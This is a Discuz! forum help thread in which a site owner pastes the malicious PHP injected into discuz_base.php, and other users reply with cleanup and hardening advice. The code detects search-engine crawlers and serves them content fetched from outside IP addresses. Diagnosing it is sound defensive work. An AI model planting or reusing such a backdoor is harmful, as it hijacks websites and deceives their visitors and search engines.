返回列表 发帖
查看: 5210|回复: 9

[求助] source\class\discuz\discuz_base.php文件被修改了

yyw

14

主题

19

回帖

36

积分

初学乍练

贡献
0 点
金币
0 个
发表于 2021-4-17 12:47:01 | 显示全部楼层 |阅读模式
source\class\discuz\discuz_base.php文件被修改了,被加了代码,如下:
set_time_limit(30);
error_reporting(0);
$tr = "stristr";
$er = $_SERVER;
function httpGet($url) {
  $ch = curl_init();

  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_HEADER, 0);

  $output = curl_exec($ch);

  curl_close($ch);

  return $output;
}
$filename1 = @end(explode('/', $url1));
function set_writeable($file_name)
{
    @chmod($file_name, 0755);
}
@chmod(__FILE__, 0755);
set_writeable($filename1);
define('url', $er['REQUEST_URI']);
define('ref', $er['HTTP_REFERER']);
define('ent', $er['HTTP_USER_AGENT']);
define('site', "http://155.159.254.236:9867");
define('road', "?/" .$er['HTTP_HOST'] . url);
define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');
define('area', $tr(url, ".xml") or $tr(url, ".doc") or $tr(url, ".pdf") or $tr(url, ".txt") or $tr(url, ".ppt") or $tr(url, ".pptx") or $tr(url, ".xls") or $tr(url, ".csv") or $tr(url, ".shtml") or $tr(url,".tacc")or $tr(url,".ga")or $tr(url,".gq")or $tr(url, ".xlsx") and $tr(url, "?"));
if (area && preg_match(regs, ref)) {
    echo file_get_contents('http://155.159.254.254:9368/sb.html');
    exit;
}
if (preg_match(regs, ent)) {
    if (area) {
        echo httpGet(site.road);
        exit;
    } else {
        echo httpGet("http://155.159.254.254:9368/u.php");
        ob_flush();
        flush();
    }
}



我知道答案 回答被采纳将会获得1 贡献 已有9人回答
回复

使用道具 举报

2

主题

1412

回帖

2043

积分

应用开发者

啦啦啦~

贡献
55 点
金币
320 个
发表于 2021-4-17 13:10:52 | 显示全部楼层
这个需要您自行清理环境,完了升级最新版本解决。
回复 支持 反对

使用道具 举报

2

主题

1412

回帖

2043

积分

应用开发者

啦啦啦~

贡献
55 点
金币
320 个
发表于 2021-4-17 13:13:37 | 显示全部楼层
如果之前用的就是最新版本,一般都是底层环境有漏洞或者密码泄露,或者 Discuz! / UCenter 管理员密码 / UC_KEY 泄露导致的。
老周博客
本人不在任何渠道提供任何付费技术支持服务, 谨防上当受骗.
回复 支持 反对

使用道具 举报

yyw

14

主题

19

回帖

36

积分

初学乍练

贡献
0 点
金币
0 个
 楼主| 发表于 2021-4-17 13:33:02 | 显示全部楼层
老周部落 发表于 2021-4-17 13:13
如果之前用的就是最新版本,一般都是底层环境有漏洞或者密码泄露,或者 Discuz! / UCenter 管理员密码 / UC ...

烦死了,文件全都用官方替换了,密码也改了,这个月已经中招三次了,今天又发现index.php又被改了。
回复 支持 反对

使用道具 举报

2

主题

1412

回帖

2043

积分

应用开发者

啦啦啦~

贡献
55 点
金币
320 个
发表于 2021-4-17 14:23:29 | 显示全部楼层
yyw 发表于 2021-4-17 13:33
烦死了,文件全都用官方替换了,密码也改了,这个月已经中招三次了,今天又发现index.php又被改了。 ...

1. 服务器是否沦陷了,建议重新部署一次,整个目录全面杀毒,只提取必要的部分部署,避免单独的后门文件。
2. 重新部署的时候建议使用比较新的 Linux 发行版,并正确配置写入权限。
3. 关闭掉乱七八糟的插件、模板,建议关闭卸载并删除文件,避免黑客通过后门进入。
4. UC_KEY 以及应用 AUTHKEY 建议都重置一次,避免黑客掌握这些。
5. 所有的管理员密码全部强制重置一次。
老周博客
本人不在任何渠道提供任何付费技术支持服务, 谨防上当受骗.
回复 支持 反对

使用道具 举报

83

主题

2795

回帖

3564

积分

功行圆满

贡献
22 点
金币
351 个
发表于 2021-4-17 18:59:09 | 显示全部楼层
盗版插件不先清除,中招问题没法解决的说。
回复 支持 反对

使用道具 举报

18

主题

1804

回帖

2712

积分

应用开发者

贡献
49 点
金币
574 个
QQ
发表于 2021-4-23 01:49:24 | 显示全部楼层
yyw 发表于 2021-4-17 13:33
烦死了,文件全都用官方替换了,密码也改了,这个月已经中招三次了,今天又发现index.php又被改了。 ...

挂马了 做好服务器安全先
无限星辰工作室  好集导航 免费API
服务Discuz建站|定制|小程序|APP定制|故障维修|搬家|运维|挂马清理|防护|性能优化|安全运维|
服务理念:专业 诚信 友好QQ842062626 服务
回复 支持 反对

使用道具 举报

20

主题

727

回帖

1006

积分

已臻大成

贡献
26 点
金币
74 个
发表于 2021-4-23 02:22:16 | 显示全部楼层
插件盗版?
回复

使用道具 举报

2

主题

1412

回帖

2043

积分

应用开发者

啦啦啦~

贡献
55 点
金币
320 个
发表于 2021-4-26 22:27:23 | 显示全部楼层
老周部落 发表于 2021-4-17 14:23
1. 服务器是否沦陷了,建议重新部署一次,整个目录全面杀毒,只提取必要的部分部署,避免单独的后门文件 ...

6. 建议完善权限设置,除 data 、template 以及 source/plugin 外,其他目录不允许写入,这三个目录不允许用户直接访问 .php 文件。
老周博客
本人不在任何渠道提供任何付费技术支持服务, 谨防上当受骗.
回复 支持 反对

使用道具 举报

56

主题

1451

回帖

3万

积分

管理员

贡献
2072 点
金币
1383 个
发表于 2021-5-14 11:28:45 | 显示全部楼层
被入侵肯定不止一个后门,要清理干净全部后,再升级最新版,再做其他安全设置。
自己处理不干净,可以考虑找人处理:https://addon.dismall.com/service.html
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

  • 关注公众号
  • 有偿服务微信
  • 有偿服务QQ

手机版|小黑屋|Discuz! 官方交流社区 ( 皖ICP备16010102号 |皖公网安备34010302002376号 )|网站地图|star

GMT+8, 2024-3-29 13:30 , Processed in 0.045399 second(s), 7 queries , Redis On.

Powered by Discuz! W1.0 Licensed

Cpoyright © 2001-2024 Discuz! Team.

关灯 快速发帖
有偿服务QQ
有偿服务微信
返回顶部
快速回复 返回顶部 返回列表